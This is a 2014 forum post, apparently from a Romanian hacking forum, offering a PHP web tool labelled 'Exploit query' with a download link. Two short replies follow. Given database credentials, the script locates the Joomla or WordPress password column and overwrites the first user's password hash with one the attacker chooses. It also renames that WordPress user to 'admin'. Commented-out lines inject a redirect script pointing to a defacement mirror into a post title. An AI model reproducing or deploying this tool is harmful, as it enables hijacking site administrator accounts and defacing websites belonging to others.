io.kent Posted June 25, 2014 Report Share Posted June 25, 2014 query.php<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Exploit query 2011 #</title></head><style type="text/css">body{ background: #333333; color: #fff; font-family: Consolas; font-size: 13px;}.text { background: #fff; color: #000;}.text:hover { background: #FFFFCC;}.submit { background: #333330; padding: 2px; margin: 0px; color: #fff; border: thick;}.submit:hover { background: #555;}</style><body><center><h2># Mysql Query #</h2><form action="" method="post">host : <input type="text" value="localhost" name="localhost" class="text" /> db : <input type="text" name="db" class="text" /><br />user : <input type="text" name="userdb" class="text" /> pass : <input type="text" name="passdb" class="text" /><br /> <br />What password ! : <input type="text" name="mdpass" class="text" /><br />joomla : <input type="radio" value="1" name="ch1" /> wordpress: <input type="radio" value="2" name="ch1" /> <br /> <br /><input type="submit" name ="go" value="#- Done -#" class="submit" /></form></center><?$host = $_POST['locch1alhost'];$dbname = $_POST['db'];$dbuser = $_POST['userdb'];$dbpass = $_POST['passdb'];$kolk = md5($_POST['mdpass']);if ($_POST['ch1'] == 1) { $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database"); $selectdb = mysql_select_db($dbname,$connect); $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_sche ma) from information_schema.columns where column_name LIKE "%pas%"'); $show = mysql_fetch_array($cyber); $defg = $show[0]; $imp = explode(':',$defg); $ar = $imp[0]; $conar = mysql_query("SELECT * FROM $ar"); $showar = mysql_fetch_array($conar); ################# set $setar = mysql_query("UPDATE $ar SET password='".$kolk."' WHERE id = '".$showar[0]."' "); echo $setar; echo "user name is -> $showar[2]";} else if ($_POST['ch1'] == '2') { $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database"); $selectdb = mysql_select_db($dbname,$connect); $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_sche ma) from information_schema.columns where column_name LIKE "%user_pass%"'); $show = mysql_fetch_array($cyber); $defg = $show[0]; $imp = explode(':',$defg); $ar = $imp[0]; $conar = mysql_query("SELECT * FROM $ar"); $showar = mysql_fetch_array($conar); ################# set $setar = mysql_query("UPDATE $ar SET user_pass='".$kolk."' WHERE id = '".$showar[0]."' "); $setar .= mysql_query("UPDATE $ar SET user_login='admin' WHERE id = '".$showar[0]."' "); echo $setar; echo "user name is -> $showar[1]"."<br />"; #$qurl = mysql_query("select guid from wp_posts"); #$scr = "<script>document.location='http://zonehmirrors.net/defaced/2011/10/07/ecocolourchembd.com'</script>"; #$indq = mysql_query('UPDATE wp_posts SET post_title="'.$scr.'" WHERE id =1'); #$indexar = mysql_fetch_array($indq); #$qin = mysql_query("select post_title from wp_posts where id =1"); #$rqin = mysql_fetch_array($qin); # echo htmlspecialchars("$rqin[0]"); $q = mysql_query("select * from wp_options where option_id='1' or option_name='home'"); while($wos = mysql_fetch_object($q)){ if ($wos){ echo "URL : ~> ".$wos->option_value."<br>"; }} }?></body><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><center><b>Meked By Cyber-Crystal </b></center></html>Download Tool: "wpdef" Download wpdef.rar Quote Link to comment Share on other sites More sharing options...
totti93 Posted June 25, 2014 Report Share Posted June 25, 2014 Behind every success There is enemiesClar, "este" dusmani multi. Fara numar! Quote Link to comment Share on other sites More sharing options...
starlin1337 Posted June 25, 2014 Report Share Posted June 25, 2014 Pe ce versiune de wordpress merge ? Si cum se poate repara "vulnerabilitatea"? Quote Link to comment Share on other sites More sharing options...
